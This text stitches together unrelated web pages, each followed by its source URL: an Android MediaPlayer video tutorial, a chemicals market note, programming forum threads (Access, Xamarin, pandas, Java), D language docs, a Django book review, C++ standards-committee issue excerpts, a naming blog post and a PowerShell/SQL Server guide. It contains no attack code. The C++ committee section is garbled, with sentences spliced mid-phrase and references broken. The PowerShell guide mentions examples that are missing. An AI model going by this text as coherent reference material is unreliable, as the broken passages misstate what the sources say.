To install a PowerShell module means nothing more than to copy the module files to a folder on a computer. To load a module in small projects is pretty simple: you just need to use the Import-Module cmdlet. If you don't specify the path of the module, PowerShell will look in the environment variable $ENV:PSMODULEPATH, check whether the module is there, and automatically load it. In PowerShell 2.0 you need to explicitly call Import-Module in your profile.

Further reading:

Most of the code you will see that uses SMO does not leave the loading of assemblies to SQLPS, but instead uses the LoadWithPartialName method.
This method is deprecated because it doesn't give you control of the version of SMO that will be loaded if you have several versions on your system; the choice of file is controlled by the GAC*. On the other hand, using Add-Type can be a pain, because you need to be explicit about the version and change your code. Let's take a look at some examples:

LoadWithPartialName

The general way:

But we also can check if there is any SMO installed, and return an error if not; otherwise it will be loaded:

Add-Type

The general way:

Testing:

The recommended way is to use Add-Type, but what is the best approach? Well, it depends. If you are dealing with several versions of SMO and that's not a problem for your PowerShell environment, then LoadWithPartialName will be easier; otherwise, use Add-Type. But always remember that LoadWithPartialName is a deprecated method and at some point will be excluded from the framework.

Checking which version of SMO or SQLPS was loaded in the session

By default, PowerShell loads some assemblies when you open a session. Of course, it needs some basic assemblies to work properly. SMO is a .NET library and it needs to be loaded. The same happens with the SQLPS module. To find out which assemblies were loaded, you can use this code (credits to fellow PowerShell MVP Richard Siddaway – Assemblies loaded in PowerShell):

For our purposes, we just need to filter for SMO:

Finding out the version of the SQLPS module is a little different. PowerShell has a cmdlet called Get-Module that shows all the information on the modules. It also has a parameter to check whether a specific module was loaded:

You can also check which modules are available to load using the parameter -ListAvailable.

The Get-Module cmdlet will search all the modules available in the environment variable $Env:PSMODULEPATH, a special variable that contains all the paths for the installed modules, and will list them for you.
Determining the version of SQLPS that PowerShell will load

If you use the name parameter, PowerShell will always check the $env:PSModulePath variable and then will, according to fellow PowerShell MVP Joel Bennett, import modules in the following order: path order, then alphabetic order, then highest version if you have side-by-side modules in the same folder (in PS5).

That's an interesting question that came up in the comments on the SMO stairway, and I will give a different answer for SQLPS, which is a module, and for SMO, which is a group of assemblies. As we saw, if we use the -Name parameter in Import-Module, it will load SQLPS in the order given by the environment variable. So in this specific case we use the parameter -FullyQualifiedName:

Or even the parameter -Name with the fully qualified path:

The point is that you need to specify the path for the SQLPS module. Shawn Melton showed, in the comments, a very cool function to make the job easy. In this function, you can pass as a parameter the version you want to import, and the default is 130. This example will load the highest SQLPS version. We ended up with another version of Shawn's function where you can choose the most recent SQLPS version by using a switch parameter -Highest.

If you use the code that I included earlier on, it will only show you the assemblies that are already loaded in your session. If you use the LoadWithPartialName method to load SMO, this is controlled by the GAC*. If you want to load a specific version of SMO, I recommend that you use Add-Type, and you can then specify which version will be loaded:

Using the same idea from Shawn, we could do something similar with SMO, but for this we would need to query the GAC. Let's say we want to load the highest version of SMO installed. We could then develop this to speed it up by saving on the pipeline traffic; this is achieved by doing the selection within the Get-ChildItem cmdlet.
You can read more about how modules work in PowerShell here: (Importing a PowerShell Module)

*GAC, or Global Assembly Cache, is a machine-wide code cache where assemblies are installed and stored to be shared between applications on the computer.

Creating a Custom Type Accelerator for SMO

You will sometimes find, when you load an assembly like SMO, that spelling out the .NET types is laborious. Type accelerators are a great help for getting around this. Type accelerators are like shortcuts for .NET types; they can simplify your code and make it more intelligible. For instance, [adsi] is a type accelerator for System.DirectoryServices.DirectoryEntry, and [pscustomobject] for System.Management.Automation.PSObject. You can do the same for SMO.

This code shows the type accelerators currently defined in your session:

To create a custom type accelerator you just need to add the key and the .NET type. So, for instance, to create a type accelerator for the SMO Server:

Then I can easily access all properties and methods using the new type accelerator, or also call a method.

Now just play around with it, and add your custom SMO type accelerators to your PowerShell profile so that they are loaded for you.

Reference: Boe Prox – Quick Hits: Finding, Creating and Removing PowerShell Type Accelerators

Conclusion

There really isn't a single best method of accessing SQL Server via PowerShell. What you use depends on what you need to achieve. Every approach has its advantages and disadvantages. In this article, I've described how to get up and running with each of these approaches, and I've tried to suggest the best ways of approaching the task.
https://www.red-gate.com/simple-talk/sql/database-administration/the-posh-dba-accessing-sql-server-from-powershell/
CC-MAIN-2019-35
refinedweb
2,294
59.13
Read / Write CSV file in Java

- By Viral Patel on November 1, 2012

If you want to work with Comma-separated Files (CSV) in Java, here's a quick API for you. As Java doesn't support parsing of CSV files natively, we have to rely on a third party library. Opencsv is one of the best libraries available for this purpose. It's open source and is shipped with the Apache 2.0 licence, which makes it possible for commercial use. Let us see different APIs to parse a CSV file. Before that we will need certain tools for this example:

Tools & Technologies

Let's get started.

1. Reading CSV file in Java

We will use the following CSV sample file for this example:

File: sample.csv

COUNTRY,CAPITAL,POPULATION
India,New Delhi, 1.21B
People's republic of China,Beijing, 1.34B
United States,Washington D.C., 0.31B

Read CSV file line by line:

String csvFilename = "C:\\sample.csv";
CSVReader csvReader = new CSVReader(new FileReader(csvFilename));
String[] row = null;
while ((row = csvReader.readNext()) != null) {
    System.out.println(row[0] + " # " + row[1] + " # " + row[2]);
}
//...
csvReader.close();

In the above code snippet, we use the readNext() method of the CSVReader class to read the CSV file line by line. It returns a String array for each row. It is also possible to read the full CSV file at once; the readAll() method of the CSVReader class comes in handy for this.

String[] row = null;
String csvFilename = "C:\\work\\sample.csv";
CSVReader csvReader = new CSVReader(new FileReader(csvFilename));
List content = csvReader.readAll();
for (Object object : content) {
    row = (String[]) object;
    System.out.println(row[0] + " # " + row[1] + " # " + row[2]);
}
//...
csvReader.close();

The readAll() method returns a List of String[] for the given CSV file. Both of the above code snippets print this output:

Output

COUNTRY # CAPITAL # POPULATION
India # New Delhi # 1.21B
People's republic of China # Beijing # 1.34B
United States # Washington D.C. # 0.31B

Use different separator and quote characters

If you want to parse a file with another delimiter, like semicolon (;) or hash (#), you can do so by calling a different constructor of the CSVReader class:

CSVReader reader = new CSVReader(new FileReader(file), ';');
//or
CSVReader reader = new CSVReader(new FileReader(file), '#');

Also, if your CSV file's values are quoted with single quotes (') instead of the default double quotes ("), you can specify that in the constructor:

CSVReader reader = new CSVReader(new FileReader(file), ',', '\'');

It is also possible to skip a certain number of lines from the top of the CSV while parsing. You provide how many lines to skip in CSVReader's constructor. For example, the reader below will skip 5 lines from the top of the CSV and start processing at line 6.

CSVReader reader = new CSVReader(new FileReader(file), ',', '\'', 5);

2. Writing CSV file in Java

Creating a CSV file is as simple as reading one. All you have to do is create the data list and write it using the CSVWriter class. Below is the code snippet where we write one line in a CSV file.

String csv = "C:\\output.csv";
CSVWriter writer = new CSVWriter(new FileWriter(csv));
String[] country = "India#China#United States".split("#");
writer.writeNext(country);
writer.close();

We created an object of class CSVWriter and called its writeNext() method. The writeNext() method takes String[] as an argument. You can also write a List of String[] to CSV directly. Following is the code snippet for that.

String csv = "C:\\output2.csv";
CSVWriter writer = new CSVWriter(new FileWriter(csv));
List data = new ArrayList();
data.add(new String[] {"India", "New Delhi"});
data.add(new String[] {"United States", "Washington D.C"});
data.add(new String[] {"Germany", "Berlin"});
writer.writeAll(data);
writer.close();

We used the writeAll() method of class CSVWriter to write a List of String[] as a CSV file.

3. Mapping CSV with Java beans

In the above examples we saw how to parse a CSV file and read the data in it.
We retrieved the data as a String array: each record got mapped to a String[]. It is also possible to map the result to a Java bean object. For example, we created a Java bean to store country information.

Country.java – the bean object to store country information:

package net.viralpatel.java;

public class Country {
    private String countryName;
    private String capital;

    public String getCountryName() {
        return countryName;
    }
    public void setCountryName(String countryName) {
        this.countryName = countryName;
    }
    public String getCapital() {
        return capital;
    }
    public void setCapital(String capital) {
        this.capital = capital;
    }
}

Now we can map this bean with Opencsv and read the CSV file. Check out the example below:

ColumnPositionMappingStrategy strat = new ColumnPositionMappingStrategy();
strat.setType(Country.class);
String[] columns = new String[] {"countryName", "capital"}; // the fields to bind to in your JavaBean
strat.setColumnMapping(columns);

CsvToBean csv = new CsvToBean();
String csvFilename = "C:\\sample.csv";
CSVReader csvReader = new CSVReader(new FileReader(csvFilename));
List list = csv.parse(strat, csvReader);
for (Object object : list) {
    Country country = (Country) object;
    System.out.println(country.getCapital());
}

Check how we mapped the Country class using ColumnPositionMappingStrategy. The method setColumnMapping is used to map each property of the Java bean to a CSV position. In this example we map the first CSV value to the countryName attribute and the next to capital.

4. Dumping SQL Table as CSV

OpenCSV also provides support to dump data from a SQL table directly to CSV. For this we need a ResultSet object. The following API can be used to write data to CSV from a ResultSet:

java.sql.ResultSet myResultSet = getResultSetFromSomewhere();
writer.writeAll(myResultSet, includeHeaders);

The writeAll(ResultSet, boolean) method is used for this. The first argument is the ResultSet which you want to write to the CSV file.
And the second argument is a boolean which represents whether you want to write the header columns (table column names) to the file or not.

Download Source Code

ReadWrite_CSV_Java_example.zip (356 KB)

Very helpful tutorials!! keep it up. Cheers

You've reached here too ;) keep it up????????

Hi SIr, I want to display one row data into another row with same values . e.g. first row contains same value after reading program output file will be 2 rows same values plzz help me..Thanks

hi.. I want to know about how to map csv file with database.my project on J2EE so please help me.how to view ,update ,upload,delete csv file .thank you.

Thank you for this post. A question: how would you deal with values that contain commas? For example if there's a company name Some Company, Inc.. The usual parsing will interpret the comma between company and Inc as separate values, and this throws everything off. I have no control over the csv file — I need to work with it the way it is. Thanks!

man after a long search I found you, and I hope you'll relieve me of my frustration. Thing is I've .CSV files and .CSV data dumps from a website for which im an affiliate and when i'm trying to upload them to my wordpress website nothing is working! I just want to upload my .CSV and make galleries on my webpage, pls help me out with this; could you suggest any csv plugin that works with wordpress? I failed with everything available. I'm clueless! Thanks in advance

Hello Mr Patel . Regards Prag Tyagi

thanks It helped.…..

How to update CSV files using openCSV ??

Hi Viral, Can you please tell me which is the best CSV reader provided by different opensource stuff. ex. Apace,Sourceforge have their csvReader API.
In the same way, i need a CSVReader which can read and parse the file to a List of record objects. You can suggest any other also. Please reply me asap. Thanks in advance!!

When I am using the above code, it is not fetching the complete data, however its fetching data from in between. Any pointers…

You may want to look at Ostermiller CSV parser () I have been using it for the past 8+ years and it is too good.

Hi Viral, I am facing a strange issue while reading the csv rows, the values are appended with special characters at the end of the String. I am reading and converting to a bean using CsvToBean like this:

CSVReader csvReader = new CSVReader(new FileReader(chargebackFileName), ',', '\"', '\\', 2, false, true);

Can you help with what can be the issue. Thanks

Very Nyc Tutorials… Good tutuorial! Very helpful Very Hepful.. thanks a lot! Cool!!

Hi Viral, Take a look at bindy for .csv files. It supports annotations as well. Great work !

how to validate date format in that .i dont know please tell me its urgent to me.

vary useful one Thanks a lot. Very Use full guide.

can openCSV be used in mutithreaded environment.

hi dude, this information is very useful to me… keep it up and you have any idea about file API's other than JAVA FILE API's pls listing out in the site…. ok,not bad

Hi Viral Patel, thank you so much. The article helped me to achieve a task. Others articles in others pages only gave me a headache. This is very helpful.

Hello!
Sir can you help me to write a code, in which i have to read a csv file,

"Sumit","B.H Singh","1500","45","no","53"
"Pragya Rani","Romesh Kumar","1600","47","no","56"
"Ravina Singh","Jagjit Singh","1580","48","yes","76"
"Rajit Sharma","Hardik Sharma","1630","50","no","67"
"Shilpa Sharma","B.K Sharma","1590","42","no","67"
"Tanvi Verma","Suresh Singh","1620","38","yes","78"
"Ritu Sharma","Naresh Sharma","1530","35","yes","34"
"Anmol Garg","Atul Garg","1570","40","yes","62"

then sort it according to last column, then write it to another text file in sorted way.

private static void readLineByLineExample() throws IOException {
    BufferedReader CSVFile = new BufferedReader(new FileReader("C:\\Users\\Desktop\\std_db.sql"));
    String dataRow = CSVFile.readLine(); // Read first line.
    // The while checks to see if the data is null. If
    // it is, we've hit the end of the file. If not,
    // process the data.
    while (dataRow != null) {();
    // End the printout with a blank line.
    System.out.println();
}

hi this is the code which i am runnig for cvs file reader..but its not working :( what is wrong?

import java.io.*;
import java.util.Arrays;

public class CSVRead {
    public static void main(String[] arg) throws Exception {
        BufferedReader CSVFile = new BufferedReader(new FileReader(
                "D:\\aaTamilpersonnel\\12 may 2014\\part-00000(1)"));
        String dataRow = CSVFile.readLine();
        while (dataRow != null) {
            String[] dataArray = dataRow.split("\t");
            for (String item : dataArray) {
                System.out.print(item + "\t");
            }
            System.out.println(); // Print the data line.
            dataRow = CSVFile.readLine(); // Read next line of data.
        }
        CSVFile.close();
        // End the printout with a blank line.
        System.out.println();
    }
}

This code will work . Make sure that you are using correct delimiter.

Hi,its very helpful but is it possible to update particular cell value using open csv?keeping all row elements same ?

Good time saving article can you just give an idea how to ceate xml from .csv file.
u cant create xml from csv cz its impossible… :p

Type mismatch: cannot convert from List to List
Syntax error on token "add", = expected after this token
Syntax error on token "data", VariableDeclaratorId expected after this token
Syntax error on token "data", VariableDeclaratorId expected after this token
Syntax error on token "data", VariableDeclaratorId expected after this token
Syntax error on token "close", Identifier expected after this token

if my csv file is like this

ID,NAME
1,xyz
2,pqr
,
3,abc
————————END

How i can get exact row where data is present??? that is 1,2,3 i must get at the end. Can you help me for this?

Great tutorial, Thank you. However, I was wondering why they would have an overloaded constructor using different delimiter for CSVReader?. The class name implies that it is going to read Comma Separated Values, where Comma is the delimiter. Maybe DSVReader would have been a better name.

Thank you Viral, this was very helpful. Reduced my lines of code significantly. Keep up the good job.

Thanks for this post.. its very helpful…! nice work…
http://viralpatel.net/blogs/java-read-write-csv-file/
CC-MAIN-2015-18
refinedweb
2,021
68.36
Tutorial Request: drawing multi sided polygons w/ Bezier Curves

- micahmicah last edited by gferreira

hello @micahmicah, regular polygons can be described using vectors. a vector has a length and an angle. in regular polygons:

- all sides have the same length
- the sum of all external angles is 360°

here is a simple example in code:

# define polygon parameters
x, y = 300, 200
sides = 5
perimeter = 1640
angleStart = 0
angleTotal = 360
autoclose = True

# calculate side length & angle
side = perimeter / sides
angleStep = abs(angleTotal / sides)

# convert angles to radians!
angleStep = radians(angleStep)
angleStart = radians(angleStart)

# create the polygon shape
B = BezierPath()
angle = angleStart
for i in range(sides):
    # this is the crucial part:
    # use trigonometry to calculate point B
    # from point A, angle, and distance
    x += cos(angle) * side
    y += sin(angle) * side
    if i == 0:
        B.moveTo((x, y))
    else:
        B.lineTo((x, y))
    angle += angleStep
if autoclose:
    B.closePath()

fill(0, 1, 1)
strokeWidth(30)
lineCap('round')
lineJoin('round')
stroke(1, 0, 1)
drawPath(B)

from turtle import *

x, y = 300, 200
sides = 7
side = 100
angleTotal = 360
angleStep = abs(angleTotal / sides)

Screen()
t = Turtle()
for i in range(sides):
    t.forward(side)
    t.left(angleStep)

done()

↳ run this script in Terminal or SublimeText

- micahmicah last edited by

Thank you so much!
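As an aside (not part of the original thread), the trigonometry in the examples above can be sanity-checked in plain Python, without DrawBot or turtle: accumulating the vertices one side at a time should bring the walk back to its starting point, because the exterior angles sum to 360°.

```python
from math import cos, sin, radians, isclose

def polygon_points(x, y, sides, side_length, angle_start=0):
    """Walk the perimeter: at each step, move side_length along the
    current angle, then turn by the exterior angle (360 / sides)."""
    angle = radians(angle_start)
    step = radians(360 / sides)
    points = [(x, y)]
    for _ in range(sides):
        x += cos(angle) * side_length
        y += sin(angle) * side_length
        points.append((x, y))
        angle += step
    return points

# same parameters as the DrawBot example: pentagon, perimeter 1640
pts = polygon_points(300, 200, sides=5, side_length=1640 / 5)

# the last vertex coincides with the first: the polygon closes
print(isclose(pts[0][0], pts[-1][0], abs_tol=1e-6),
      isclose(pts[0][1], pts[-1][1], abs_tol=1e-6))
```

The same function reproduces the turtle example with `sides=7, side_length=100`.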
https://forum.drawbot.com/topic/78/tutorial-request-drawing-multi-sided-polygons-w-bezier-curves/4?page=1
CC-MAIN-2019-04
refinedweb
212
50.16
I am working with the TensorFlow implementation of Keras and I can use it without issues; however, my IDE thinks that the keras submodule in tf does not exist. I am using Anaconda, where I install TensorFlow and all my other libraries. I make sure that I select the right interpreter in PyCharm (all my other obscure libraries are imported without issue) and the base module from tf is imported without any problem (I get autocomplete etc.), but when I import "tensorflow.keras" the IDE complains that it cannot find the reference 'keras'. As said above, executing the files works without problem. Is there a way to tell PyCharm that there actually is a keras submodule?

PyCharm 2018.3.3 (Community Edition)
Build #PC-183.5153.39, built on January 9, 2019
JRE: 1.8.0_152-release-1343-b26 amd64
JVM: OpenJDK 64-Bit Server VM by JetBrains s.r.o
Linux 4.15.0-43-generic

Hi, As a first troubleshooting step, can you try to find where the keras module is physically located in your packages directories, and check whether this directory is present in the sys.path of your interpreter? Also, please try to open the Python console and do the import from there.

I have the same problem. I use virtualenv and it is in the "env" directory. From PyCharm's Python Console it works, though the completion is not as expected. The code works with the following import:

from tensorflow.keras import backend as K
from tensorflow.keras.layers import Lambda, Input, Flatten
from tensorflow.keras.models import Model

But PyCharm shows an "Unresolved reference" error. My workaround is this:

import tensorflow as tf
keras = tf.keras
K = keras.backend
KL = keras.layers
Lambda, Input, Flatten = KL.Lambda, KL.Input, KL.Flatten
Model = keras.Model

Hey Adam, Yes, I can reproduce the issue, but please note that it's expected in some limited cases. The tooltip for that inspection says: "This inspection detects names that should resolve but don't.
Due to dynamic dispatch and duck typing, this is possible in a limited but useful number of cases. Top-level and class-level items are supported better than instance items." So another workaround would be to disable that inspection.

Hi Andrey, That import is working from the Python console in PyCharm. I think yesterday (but sadly not today) my PyCharm was able to resolve this reference.

I've found a workaround. Instead, do the import as:

Same error here: cannot autocomplete in code, but it works fine in the Python console, and the workarounds posted here didn't help. I'm using TensorFlow 2.0, btw.

In TensorFlow 2.0 you can import keras using `from tensorflow.python import keras` and it will autocomplete
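For what it's worth, the underlying reason a runtime import can succeed while the IDE's static resolution fails is that a submodule attached only at runtime is invisible to file-based analysis. The mechanism can be sketched with the standard library alone; `fakepkg` below is a made-up name standing in for a package that registers its submodule dynamically, not a real library.

```python
import sys
import types

# Build a package whose submodule exists only in memory: there is no
# fakepkg/ directory on disk for a static analyzer to inspect.
pkg = types.ModuleType("fakepkg")
sub = types.ModuleType("fakepkg.keras")
sub.answer = 42
pkg.keras = sub
sys.modules["fakepkg"] = pkg
sys.modules["fakepkg.keras"] = sub

# The import system consults sys.modules first, so this succeeds at
# runtime even though no corresponding source file exists anywhere.
from fakepkg.keras import answer
print(answer)  # 42
```

This is also why the aliasing workaround (`keras = tf.keras`) quiets the IDE: the explicit assignment gives the static analyzer a concrete attribute to resolve.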
https://intellij-support.jetbrains.com/hc/en-us/community/posts/360002486739-PyCharm-cannot-import-tensorflow-keras
CC-MAIN-2019-22
refinedweb
454
60.82
Every time I've used xgboost

import pandas as pd
from sklearn import datasets
import xgboost as xgb

iris = datasets.load_iris()
dtrain = xgb.DMatrix(iris.data, label = iris.target)
params = {'max_depth': 10, 'min_child_weight': 0, 'gamma': 0, 'lambda': 0, 'alpha': 0}
bst = xgb.train(params, dtrain)

[11:08:18] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 16 extra nodes, 0 pruned nodes, max_depth=5

You will have pruned nodes using regularization! Use the gamma parameter!

The objective function contains two parts: training loss and regularization. The regularization in XGBoost is controlled by three parameters: alpha, lambda and gamma (doc):

- alpha [default=0] L1 regularization term on weights; increasing this value will make the model more conservative.
- lambda [default=1] L2 regularization term on weights; increasing this value will make the model more conservative.
- gamma [default=0] minimum loss reduction required to make a further partition on a leaf node of the tree; the larger, the more conservative the algorithm will be. range: [0,∞]

alpha and lambda are just L1 and L2 penalties on the weights and should not affect pruning. BUT gamma is THE parameter to tune to get pruned nodes. You should increase it to get pruned nodes. Watch out: it is dependent on the objective function, and it could require a value as high as 10000 or more to obtain pruned nodes.

Tuning gamma is great! It will make XGBoost converge, meaning that after a certain number of iterations the training and testing scores will not change in the following iterations (all the nodes of the new trees will be pruned). In the end it is a great switch to control overfitting!

See Introduction to Boosted Trees to get the exact definition of gamma.
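For intuition, the pruning decision that gamma drives can be sketched in plain Python with the split-gain formula from the Introduction to Boosted Trees guide. This is only an illustration of the formula (the gradient sums below are made-up numbers), not xgboost's actual implementation:

```python
def split_gain(g_left, h_left, g_right, h_right, lam=1.0, gamma=0.0):
    """Gain of a candidate split:
    0.5 * (left score + right score - parent score) - gamma,
    where score(G, H) = G^2 / (H + lambda), and G, H are the sums of
    first- and second-order gradients falling into each child."""
    def score(g, h):
        return g * g / (h + lam)
    parent = score(g_left + g_right, h_left + h_right)
    return 0.5 * (score(g_left, h_left) + score(g_right, h_right) - parent) - gamma

# Same candidate split, two gamma values: with gamma=0 the gain is
# positive and the split is kept; with gamma=10 the gain goes negative
# and the branch would be pruned.
gain_kept = split_gain(-4.0, 10.0, 6.0, 12.0, lam=1.0, gamma=0.0)
gain_pruned = split_gain(-4.0, 10.0, 6.0, 12.0, lam=1.0, gamma=10.0)
print(gain_kept > 0, gain_pruned < 0)  # True True
```

Raising gamma simply shifts every candidate split's gain downward by the same amount, which is why a large enough value turns "0 pruned nodes" into many.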
https://codedump.io/share/wIbUv3Ugu3Tu/1/output-something-other-than-390-pruned-nodes39
CC-MAIN-2017-39
refinedweb
287
66.94
The private class must not be a nested class, or it will be exported too if you added the _EXPORT keyword to the parent class.

For binary compatibility reasons, try to avoid inline code in headers; specifically, no inline constructors or destructors. If you ever add inline code, please note the following: QT_NO_CAST_FROM_ASCII, QT_NO_CAST_TO_ASCII, QT_NO_KEYWORDS. So don't forget QLatin1String.

Use static_cast if types are known. Use qobject_cast instead of dynamic_cast if types are QObject based. dynamic_cast is not only slower, but is also unreliable across shared libraries. These recommendations are also true for code that is not in headers.

Try to avoid meaningless boolean parameters in functions. Example of a bad boolean argument: static QString KApplication::makeStdCaption(const QString .: #include <kfoobase.h>

Mart 2006
https://techbase.kde.org/index.php?title=Policies/Library_Code_Policy&oldid=1604
CC-MAIN-2015-22
refinedweb
121
53.07
- NAME - SYNOPSIS - DESCRIPTION - METHODS - AUTHOR - BUGS NAME Catalyst::TraitFor::Request::REST::ForBrowsers - A request trait for REST and browsers SYNOPSIS package MyApp; use Moose; use namespace::autoclean; use Catalyst; use CatalystX::RoleApplicator; extends 'Catalyst'; __PACKAGE__->apply_request_class_roles(qw[ Catalyst::TraitFor::Request::REST::ForBrowsers ]); DESCRIPTION. METHODS This class provides the following methods: $request->method). $request->looks_like_browser: If the request includes a header "X-Request-With" set to either "HTTP.Request" or "XMLHttpRequest", this returns false. The assumption is that if you're doing XHR, you don't want the request treated as if it comes from a browser. If the client makes a GET request with a query string parameter "content-type", and that type is not an HTML type, it is not a browser. If the client provides an Accept header which includes "*/*" as an accepted content type, the client is a browser. Specifically, it is IE7, which submits an Accept header of "*/*". IE7's Accept header does not include any html types like "text/html". If the client provides an Accept header and accepts either "text/html" or "application/xhtml+xml" it is a browser. If it provides an Accept header of any sort that doesn't match one of the above criteria, it is not a browser. The default is that the client is a browser. This all works well for my apps, but read it carefully to make sure it meets your expectations before using it. AUTHOR Dave Rolsky, <autarch@urth.org> BUGS.
https://metacpan.org/pod/release/JJNAPIORK/Catalyst-Action-REST-1.20/lib/Catalyst/TraitFor/Request/REST/ForBrowsers.pm
I see a very similar effect. I have one machine running Debian amd64 sarge that I am unable to connect to - I can connect locally using a local connection. I can even connect "remotely" on the same machine by using 127.0.0.1 or its IP address. I just cannot connect remotely from another machine - I get the same "Connection Failed". A netstat shows an ESTABLISHED connection to the correct port; the connection will not go TIME_WAIT until I click cancel on the connection window (even though it says Connection failed). I've tried both Debian i386/amd64 and Solaris 10 beta 72 jconsoles (amd64 1.6.0 build) without success. An i386 machine with the exact same java -D args will allow connections. It's very very strange. java version: java version "1.5.0" Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0-b64) Java HotSpot(TM) 64-Bit Server VM (build 1.5.0-b64, mixed mode) /usr/lib/j2sdk1.5-sun/bin/java -server -Djava.awt.headless=true -Xmx896m -XX:+PrintGCDetails -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=8400 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Djava.endorsed.dirs=/usr/share/tomcat5/common/endorsed -classpath /usr/lib/j2sdk1.5-sun/lib/tools.jar:/usr/lib/j2sdk1.5-sun/jre//lib/jcert.jar:/usr/lib/j2sdk1.5-sun/jre//lib/jnet.jar:/usr/lib/j2sdk1.5-sun/jre//lib/jsse.jar:/usr/share/tomcat5/bin/bootstrap.jar:/usr/share/tomcat5/bin/commons-logging-api.jar -Dcatalina.base=/var/lib/tomcat5 -Dcatalina.home=/usr/share/tomcat5 -Djava.io.tmpdir=/var/lib/tomcat5/temp org.apache.catalina.startup.Bootstrap -config /etc/tomcat5/server0.xml start Submitted On 21-DEC-2004 bclbob Further investigation Java code: public class Sleep { public static void main( String[] args) { try { Thread.sleep(10000000); } catch (Exception e) { // eat } } } java cmd line: java -Dcom.sun.management.jmxremote.port=8900 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false Sleep still
causes the same issue on the amd64 machine, but connects fine on i386. amd64 java -version: java version "1.5.0" Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0-b64) Java HotSpot(TM) 64-Bit Server VM (build 1.5.0-b64, mixed mode) i386 java -version: java version "1.5.0" Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0-b64) Java HotSpot(TM) Client VM (build 1.5.0-b64, mixed mode) Submitted On 29-DEC-2004 opty Same problem here on Linux Mandrake 10.1 for x86-64 (Xeon EM64T here); when watching with jconsole locally, the remote jconsole connection thread is at java.net.SocketInputStream.socketRead0() for a few seconds before terminating, so there has been a connection but something failed while communicating... Submitted On 06-JAN-2005 bclbob Still an issue on Linux amd64 with SR1 java -version java version "1.5.0_01" Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_01-b08) Java HotSpot(TM) 64-Bit Server VM (build 1.5.0_01-b08, mixed mode) Can't connect remotely from Windows or Linux or Solaris 10 b72. Submitted On 14-JAN-2005 masterzen666 I confirm the problem: client on debian/sarge i386, server on debian/sarge amd64 (EM64T). Same VM running on client & server (except the 64bit one for the server): java version "1.5.0_01" Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_01-b08) Java HotSpot(TM) 64-Bit Server VM (build 1.5.0_01-b08, mixed mode) Analysis of a network trace seems to show that the remote part sends 127.0.0.1 as IP address. Analysis of a network trace taken on 'lo' (on the client) shows that jconsole tries to connect to a port that is not open on the client (because it is open on the server). It might be related to the /etc/hosts file and the hostname to IP conversion... I found the culprit and a workaround: my /etc/hosts was: 127.0.0.1 localhost localhost.localdomain server4 Changed that to: 127.0.0.1 localhost localhost.localdomain 192.168.0.230 server4 That fixed the problem.
Submitted On 19-JAN-2005 bclbob Thanks masterzen666 - that worked for me! Great work. Submitted On 21-JAN-2005 marcoesch I don't think it is related to name resolution. I am experiencing the same problem. On the server I can see the socket going into LISTEN mode on the specified port. When the client tries to connect I can see it going into ESTABLISHED with the IP address of the client running jconsole ... but still get connection failed on the client. tcp 0 0 *:9930 *:* LISTEN tcp 0 0 ::ffff:10.107.0.15:9930 ::ffff:10.107.0.25:1641 ESTABLISHED Submitted On 04-FEB-2005 opty The above evaluation trick for /etc/hosts works with a straight connection, but it won Submitted On 14-FEB-2005 bjerkz The "trick" with /etc/hosts solves it for me, too. Thanks! Submitted On 03-MAR-2005 opty /etc/hosts doesn Submitted On 03-MAR-2005 opty /etc/hosts does not resolve when using NAT or SSH tunneling Submitted On 03-MAR-2005 Caffeine0001 If you are behind a NAT or firewall and having problems, see the second reply of and. Please also add this to the JConsole FAQ. Submitted On 15-FEB-2007 I am running Ubuntu Edgy and I definitely see this problem. I don't know whose fault it is, but it's definitely a bug. I have a pretty comprehensive writeup including a workaround here: Submitted On 19-FEB-2007 HolgerK I have the same problem even with a proper hostname setup. JDK 1.5.0.11, Linux/i386, two machines. I can connect to the remote port via "telnet server port", but jconsole reports "connection failed" when started on the client (or server). BTW: the jmxremote documentation is inconsistent: 1.) GUI screwup: I found no place explaining how users and roles relate; all documentation seems to use these terms as synonyms. The remote dialog in jconsole should read "rolename", not "username" in this case. 2.) Typo: the comment in jmxremote.password reads monitorRole and measureRole.
Submitted On 29-MAR-2007 SheepShepherd For my RedHat AS3 the trick with /etc/hosts was not enough until I changed my host name with the "hostname -v <name_of_my_machine>" command (root privileges are required). Submitted On 26-JUL-2007 mipito I'm having the same problem on a Linux box and the 'hostname' fix doesn't help. Issuing 'hostname -i' gives me the true IP. I fire up the process to be monitored on the server, SSL & authentication disabled. On the client (a PC) I fire up jconsole and the connection is established as displayed by netstat, but for some reason it ends up in "connection failed". What is jconsole trying to do at this point? I can connect fine to that port using telnet. Submitted On 27-JUL-2007 mipito Ok, the problem I was running into (see my previous comment), now resolved, is that the JVM you're trying to connect to actually exposes *two* ports: the one specified via -Dcom.sun.management.jmxremote.port, and some other one. The 2nd one is random, but jconsole wants to connect to it, so if you have a firewall, and you've only opened up the above port, you're hosed. I don't know if it's possible to specify both ports on the cmd line, which is what you'd want to do if you have to poke holes in your firewall. I believe there is a way to write code to get around this problem, but that's a pain, in particular when one is not in control of that code. Submitted On 22-AUG-2008 r_d adding -Djava.rmi.server.hostname=<host ip> should help resolve this problem. PLEASE NOTE: JDK6 is formerly known as Project Mustang
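Pulling the thread's fixes together, a launch line combining the jmxremote flags with r_d's -Djava.rmi.server.hostname workaround might look like the sketch below. The port, IP and MyApp are placeholder values, not taken from any specific post, and authenticate=false / ssl=false are only sensible on a trusted network:

```shell
# Example only: pin the hostname that RMI advertises, so a remote
# jconsole connects back to the server instead of to 127.0.0.1.
java \
  -Dcom.sun.management.jmxremote.port=8400 \
  -Dcom.sun.management.jmxremote.authenticate=false \
  -Dcom.sun.management.jmxremote.ssl=false \
  -Djava.rmi.server.hostname=192.168.0.230 \
  MyApp
```

Keeping /etc/hosts pointing the hostname at the real interface, as masterzen666 described, addresses the same root cause.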
https://blog.csdn.net/iteye_8595/article/details/81896433
